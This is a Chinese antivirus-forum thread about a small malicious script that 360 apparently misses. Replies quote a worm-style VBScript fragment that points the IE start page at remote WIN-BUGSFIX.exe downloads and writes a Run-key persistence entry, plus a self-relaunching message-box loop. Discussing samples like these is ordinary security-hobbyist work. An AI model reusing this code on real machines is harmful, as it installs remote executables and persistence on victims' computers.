搜索
查看: 1416|回复: 19
收起左侧

[病毒样本] 一个360扫描不出的恶意小病毒

[复制链接]
矿工我
发表于 2020-7-21 10:30:24 | 显示全部楼层 |阅读模式
对新人友情提醒:压缩包密码打不开,用默认infected

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
川建国代理人
发表于 2020-7-21 10:49:36 | 显示全部楼层
本帖最后由 川建国代理人 于 2020-7-21 10:53 编辑
babaj 发表于 2020-7-21 10:45
记住,这玩意儿叫病毒

至少来一个echo或者rem吧
要能做到这样才算病毒吧。。。
  1. <font size="1">if num = 1 then
  2. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
  3. elseif num = 2 then
  4. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
  5. elseif num = 3 then
  6. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
  7. elseif num = 4 then
  8. regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
  9. end if
  10. end if
  11. if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
  12. regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
  13. regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
  14. end if
  15. end sub</font>
复制代码

评分

参与人数 1人气 +1 收起 理由
QVM360 + 1 版区有你更精彩: )

查看全部评分

3801187
发表于 2020-7-21 10:40:46 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
babaj
发表于 2020-7-21 10:43:08 | 显示全部楼层
do
msgbox
loop这玩意儿也叫病毒?火绒miss

川建国代理人
发表于 2020-7-21 10:44:15 | 显示全部楼层
啊这。。。
  1. do
  2. set ws=createobject("wscript.shell")
  3. ws.run "无敌病毒.vbs"
  4. set ws=createobject("wscript.shell")
  5. ws.run "??????????????????.???"
  6. msgbox"你关不掉我!"
  7. loop
复制代码
重启解决了关掉进程也行


babaj
发表于 2020-7-21 10:45:55 | 显示全部楼层
川建国代理人 发表于 2020-7-21 10:44
啊这。。。
重启解决了关掉进程也行

记住,这玩意儿叫病毒
矿工我
 楼主| 发表于 2020-7-21 11:00:14 | 显示全部楼层
我下次再加一个添加到开机启动项得了
矿工我
 楼主| 发表于 2020-7-21 11:00:45 | 显示全部楼层
babaj 发表于 2020-7-21 10:43
do
msgbox
loop这玩意儿也叫病毒?火绒miss

你可以试着运行一下
babaj
发表于 2020-7-21 11:02:07 | 显示全部楼层
矿工我 发表于 2020-7-21 11:00
你可以试着运行一下

运行着就是循环出现报错窗口
3801187
发表于 2020-7-21 11:09:54 | 显示全部楼层
川建国代理人 发表于 2020-7-21 10:49
至少来一个echo或者rem吧
要能做到这样才算病毒吧。。。

修改完文件后缀直接隔离都不让保存
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 晋ICP备20004298号-1 ) GMT+8, 2020-8-9 02:03 , Processed in 0.132645 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表